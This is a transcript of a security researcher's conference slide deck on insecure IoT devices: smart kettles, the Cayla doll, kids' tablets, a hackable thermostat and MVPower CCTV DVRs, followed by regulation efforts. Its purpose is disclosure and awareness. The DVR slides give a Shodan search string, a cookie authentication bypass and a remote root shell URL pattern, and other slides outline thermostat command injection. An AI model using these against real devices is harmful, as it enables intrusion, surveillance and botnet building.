Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!
-
Upload
beyondtrust -
Category
Software
-
view
37 -
download
2
Transcript of Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!
![Page 1: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/1.jpg)
Bought a smart toy for Xmas?
![Page 2: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/2.jpg)
Who am I?
An IoT security researcher
Part of a team of 50 who carry out extensive research in to IoT security at @pentestpartners
We help manufacturers secure their IoT products
Known for public research in to hacking Mitsubishi vehicles, My Friend Cayla, wi-fi kettles, Samsung smart TVs, fridges and much more
![Page 3: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/3.jpg)
First, some fun
![Page 4: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/4.jpg)
A Wi-Fi kettle
A Wi-Fi enabled kettle, essential for every home
Comes with mobile app, from which kettle can be boiled
Offers stunning time saving, at a £100 premium over a regular non-smart kettle
![Page 5: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/5.jpg)
How to hack a kettle
#1 port scan
#2 take it apart
#3 locate chipset manuals
#4 review source code
#5 find code fails
#6 make tea!
![Page 6: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/6.jpg)
![Page 7: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/7.jpg)
Wi-Fi is trackable. Find kettles to steal Wi-Fi security key from:
![Page 8: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/8.jpg)
Their latest releasesiKettle 3.0 – much more secure. I would use one!
Coffee machine 2.0, uses a chipset that doesn’t offer much security
Latest products much
improved
![Page 9: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/9.jpg)
Now for some swearing
![Page 10: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/10.jpg)
My Friend CaylaInteractive kids doll
Voice recognition, listens continuously whilst powered on
“Internet Safe” “Kid friendly”
Anti-profanity filters
… so can we make her swear?
… could someone use her to spy on kids?
![Page 11: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/11.jpg)
Hacking Cayla
Wikipedia API
Evil API
No Bluetooth PIN
Voice recognition
Local Q database + ‘badwords’
MITM
Modify unencrypted data in transit
Evil phone, modified app
Modify SQLite DB contents
Tamper with anti-swearing process
API call broken when Wikipedia enforced SSL!
![Page 12: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/12.jpg)
Putting it right
Manufacturer clearly doesn’t ‘get’ security
“We will be issuing an update to the mobile app to fix the issues raised” – except they didn’t
Implementing SSL will help, so long as certificate pinning is enforcedOtherwise, MITM again
But, Bluetooth promiscuity cannot be fixed, as there is no security of pairing process
![Page 13: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/13.jpg)
Vendor updates the app
Our attack stopped working a while back, after the application was finally updated
They ‘fixed’ it by encrypting the database contents with SQLcipher
Er – ignoring the issues that actually mattered
![Page 14: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/14.jpg)
My Friend Freddy Bear
Nothing changes…
Whilst reverse engineering the iOS version of Cayla’s app, another researcher (Tim Medin) found a ‘machine gun’ sound file in her code
Action Cayla?
Freddy Bear shipped last Xmas, equally vulnerable
Slightly more annoying
German app is different to UK & US apps…
![Page 15: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/15.jpg)
Even swearier
![Page 16: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/16.jpg)
Teksta Toucan
Same vendor as Cayla
Same security flaws
This Toucan needs to be banned urgently!
![Page 17: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/17.jpg)
Teksta Tekno puppy
No Bluetooth, BUT has voice recognition
Firmware contained on flash memory with no read-out protection
![Page 18: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/18.jpg)
BB-8
Firmware pushed from mobile app over http
Potential to intercept and modify. Turn to the…
Cool vendor – reported and fixed in 10 days!
![Page 19: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/19.jpg)
Anki Cosmo
Smart toys CAN be secure
Unique keys per device, loaded at factory
Why can’t all smart toys be like this?
![Page 20: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/20.jpg)
Things that listen
![Page 21: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/21.jpg)
Samsung Internet TV
Audio sent to Nuance Communications for voice->text conversion
Both directions plaintext
![Page 22: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/22.jpg)
Echo!Amazing voice recognition and sensitivity, will respond to any voice without training
Alexa voice/IoT integration is pretty secure
What do you control with it? The amazing August smart door lock?
Stand outside window, say ‘unlock door’ ?
![Page 23: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/23.jpg)
Are you having a laugh?
Stand outside window, ‘unlock BMW’
Car on drive unlocks, code key, drive off?
![Page 24: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/24.jpg)
Nespresso ProdigioBut it can get more interesting
This machine integrates Bluetooth remote control PLUS ecommerce functionality
Interesting value add for manufacturer
The mobile app has permissions to make calls silently without user interaction!
We can take control of it, but more concerning is potential to tamper with payment processes
![Page 25: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/25.jpg)
Samsung Smart Fridge
Samsung RF28HMELBSR Smart Fridge
View Google calendars, weather, recipes, TV etc
Did I say ‘utterly pointless’?
SSL connection is not ‘pinned’ so hacker can intercept and steal your email credentials from your refrigerator!
![Page 26: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/26.jpg)
Kids Tablets
![Page 27: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/27.jpg)
Tesco Hudl, £120 – popular gift for kidsHudl based on Rockchip CPU
Ran native Android
Rockchip CPU exploit allows read from firmware in addition to write
Read any user data without needing the PIN
Factory reset did not wipe data
Tesco replaced hudl with hudl 2 shortly after we reported this. Cool vendor
![Page 28: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/28.jpg)
2017 – it’s still happening
Despite extensive media coverage, several vulnerable products continued to ship after hudlwithdrawn
Aldi Medion Lifetab
Argos MyTablet
But also withdrawn in 2015
However, VTech Innotab Max is STILL SHIPPING in 2017.
Only yesterday VTech settled hacking case with FTC for $650,000
![Page 29: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/29.jpg)
Holding your IoT to ransom
![Page 30: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/30.jpg)
Ransomware
Could we take control of a smart thermostat?
Could we lock the user out and hold their heating/cooling to ransom?
A likely candidate found on Amazon
Quick check of FCC search suggested ARM/Linux
![Page 31: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/31.jpg)
Unpacking firmware
BINGO! We have the filesystem
![Page 32: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/32.jpg)
Examining firmware
Remember SQL injection for web applications?
We can carry out similar attacks against filesystems using command injection
User input is not validated in some cases
The upload function for the screen background image is not validated correctly, so arbitrary commands can be executed
The developer gave no thought to attackers getting hold of the firmware:
![Page 33: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/33.jpg)
More developer issuesThis dev really didn’t think their code would ever be seen!
![Page 34: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/34.jpg)
Taking control
Now we can upload a shell and gain full control of the thermostat, it even survives a reboot – APT?
Create an IRC channel so we can control the stat remotelyChange the screen lock PIN to lock the user outChange the screen background to some ransomwareSend on/off messages to boiler & a/c 3 times per second until they fail
All because a filename was implicitly trusted by device
![Page 35: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/35.jpg)
Smart watches
![Page 36: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/36.jpg)
Kids Tablets
![Page 37: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/37.jpg)
Tesco Hudl, £120 – popular gift for kidsHudl based on Rockchip CPU
Ran native Android
Rockchip CPU exploit allows read from firmware in addition to write
Read any user data without needing the PIN
Factory reset did not wipe data
Tesco replaced hudl with higher spec hudl 2 shortly after we reported this. Cool vendor!
![Page 38: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/38.jpg)
2017 – it’s still happening
Despite extensive media coverage, several vulnerable products continued to ship after hudlwithdrawn
Aldi Medion Lifetab
Argos MyTablet
But also withdrawn in 2015
However, Vtech Innotab Max is STILL SHIPPING in 2017
![Page 39: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/39.jpg)
Mirai: kills Facebook for 2 hours
![Page 40: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/40.jpg)
IoT DVR for CCTV
Hard disc on the DVR records your CCTV
You can view your CCTV remotely on a mobile app
Opens port 80 inbound from the internet
Could we steal personal data AND take down the internet with one device?
![Page 41: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/41.jpg)
MVPower DVR
~44,000 on shodanhq.com
Search for
“JAWS/1.0”
![Page 42: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/42.jpg)
MVPower DVR – Very bad... Easy to bypass web authentication by changing cookie values
dvr_usr = <anyusername>
dvr_password = <anypassword>
![Page 43: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/43.jpg)
MVPower DVR – It gets worse....
Remote root shell availablehttp://<hostname/IP>/shell?<command>
Available whenever the webserver is runningWeb server needed to use the device
Can’t get much worse.....can it?
![Page 44: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/44.jpg)
MVPower DVR – appalling privacy invasion
Still images of your CCTV video sent to developers email address
Apparently this was pre-release testing firmware that made its way in to production
No response to disclosure attempts, until we Rickrolledhim, frame by frame
![Page 45: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/45.jpg)
![Page 46: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/46.jpg)
ConsequenceMirai v1 knocked many social networks off the internet for ~2 hours in October 2016
Lack of persistence means that botnet operators are competing for control, so no huge botnets have yet been built
Vulnerabilities overlooked in just one IoT device (XM-based DVRs) allow creation of a botnet capable of >>1Tb/s of DDoS
This risk is significant: are your IoT devices the next source of an attack?
![Page 47: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/47.jpg)
New Laws around IoT
![Page 48: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/48.jpg)
My Friend Cayla
German telecoms regulator bans Cayla
On grounds that she has ‘covert audio bugging capability’
EUR 25,000 fine for possession
Legal cases around IoT emerging
![Page 49: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/49.jpg)
US Senate draft IoT security bill
A great step in the right direction
US government departments and agencies may not use IoT devices that do not comply with basic security standards
Some issues requiring debate, though this bill is almost beautifully simple
![Page 50: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/50.jpg)
Efforts in the EU
Various EU publications and drafts
ENISA making progress
Julia Reda (Greens/EFA)
“State of the Cyber: 10 proposals for improving IT security in the EU”
![Page 51: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/51.jpg)
Standards and good guidance
It is already out there:
OWASP
IoTSF
GSMA
etc
Plenty of lobbyists and IoT researchers!
@iamthecavalry
@internetofshit
![Page 52: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/52.jpg)
Regulation, Legislation and Litigation
![Page 53: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/53.jpg)
@thekenmunroshow
@pentestpartners
Blog: www.pentestpartners.com – full of useful advice
If you need help with your IoT security, call us